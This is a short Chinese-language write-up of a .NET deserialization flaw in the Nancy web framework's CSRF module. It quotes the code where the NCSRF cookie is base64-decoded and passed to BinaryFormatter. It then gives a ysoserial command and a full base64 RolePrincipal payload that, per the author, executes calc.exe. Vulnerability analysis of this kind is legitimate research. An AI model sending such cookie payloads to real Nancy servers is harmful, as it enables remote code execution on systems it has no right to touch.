Nancy 反序列化漏洞分析
前言
找一個有意思的NET反序列化案例來看看,水篇文
漏洞分析
Github下載https://github.com/NancyFx/Nancy.Demo.Samples
運行啓動
部分工具類在dll中,封裝成dll進行引用
漏洞代碼位於 Nancy.Security.Enable
中,在項目初始化的時候調用Initialize
方法進行啓用csrf模塊功能
if (context.Response == null || context.Response.Cookies == null)
{
return;
}
if (context.Items.ContainsKey("NCSRF"))
{
context.Response.Cookies.Add(new NancyCookie("NCSRF", (string)context.Items["NCSRF"], true));
return;
}
if (context.Request.Cookies.ContainsKey("NCSRF"))
{
string text = HttpUtility.UrlDecode(context.Request.Cookies["NCSRF"]);
CsrfToken cookieToken = CsrfApplicationStartup.ObjectSerializer.Deserialize(text) as CsrfToken;
判斷Cooie 中是否NCSRF
有NCSRF
值,有的話獲取COOKIE中的NCSRF值,進行url解碼,隨後進行反序列化爲CsrfToken
類
public object Deserialize(string sourceString)
{
if (string.IsNullOrEmpty(sourceString))
{
return null;
}
object result;
try
{
byte[] buffer = Convert.FromBase64String(sourceString);
BinaryFormatter binaryFormatter = new BinaryFormatter();
using (MemoryStream memoryStream = new MemoryStream(buffer, false))
{
result = binaryFormatter.Deserialize(memoryStream);
}
}
讀取cookie 中NCSRF
內容base64解密後使用BinaryFormatter
進行反序列化操作。
那麼下面來構造POC
ysoserial.exe -f binaryformatter -g RolePrincipal --minify -c "calc.exe"
AAEAAAD/////AQAAAAAAAAAMAgAAAEpTeXN0ZW0uV2ViLFZlcnNpb249NC4wLjAuMCxDdWx0dXJlPW5ldXRyYWwsUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYQUBAAAAIVN5c3RlbS5XZWIuU2VjdXJpdHkuUm9sZVByaW5jaXBhbAEAAAAqU3lzdGVtLlNlY3VyaXR5LkNsYWltc1ByaW5jaXBhbC5JZGVudGl0aWVzAQIAAAAGAwAAAMwFQUFFQUFBRC8vLy8vQVFBQUFBQUFBQUFNQWdBQUFCdE5hV055YjNOdlpuUXVVRzkzWlhKVGFHVnNiQzVGWkdsMGIzSUZBUUFBQUVKTmFXTnliM052Wm5RdVZtbHpkV0ZzVTNSMVpHbHZMbFJsZUhRdVJtOXliV0YwZEdsdVp5NVVaWGgwUm05eWJXRjBkR2x1WjFKMWJsQnliM0JsY25ScFpYTUJBQUFBRDBadmNtVm5jbTkxYm1SQ2NuVnphQUVDQUFBQUJnTUFBQUQrQWp4UFltcGxZM1JFWVhSaFVISnZkbWxrWlhJZ1RXVjBhRzlrVG1GdFpUMGlVM1JoY25RaUlIaHRiRzV6UFNKb2RIUndPaTh2YzJOb1pXMWhjeTV0YVdOeWIzTnZablF1WTI5dEwzZHBibVo0THpJd01EWXZlR0Z0YkM5d2NtVnpaVzUwWVhScGIyNGlJSGh0Ykc1ek9tRTlJbU5zY2kxdVlXMWxjM0JoWTJVNlUzbHpkR1Z0TGtScFlXZHViM04wYVdOek8yRnpjMlZ0WW14NVBWTjVjM1JsYlNJK1BFOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNpNVBZbXBsWTNSSmJuTjBZVzVqWlQ0OFlUcFFjbTlqWlhOelBqeGhPbEJ5YjJObGMzTXVVM1JoY25SSmJtWnZQanhoT2xCeWIyTmxjM05UZEdGeWRFbHVabThnUVhKbmRXMWxiblJ6UFNJdll5QmpZV3hqTG1WNFpTSWdSbWxzWlU1aGJXVTlJbU50WkNJdlBqd3ZZVHBRY205alpYTnpMbE4wWVhKMFNXNW1iejQ4TDJFNlVISnZZMlZ6Y3o0OEwwOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNpNVBZbXBsWTNSSmJuTjBZVzVqWlQ0OEwwOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNqNEwL
響應500但是命令執行成功了。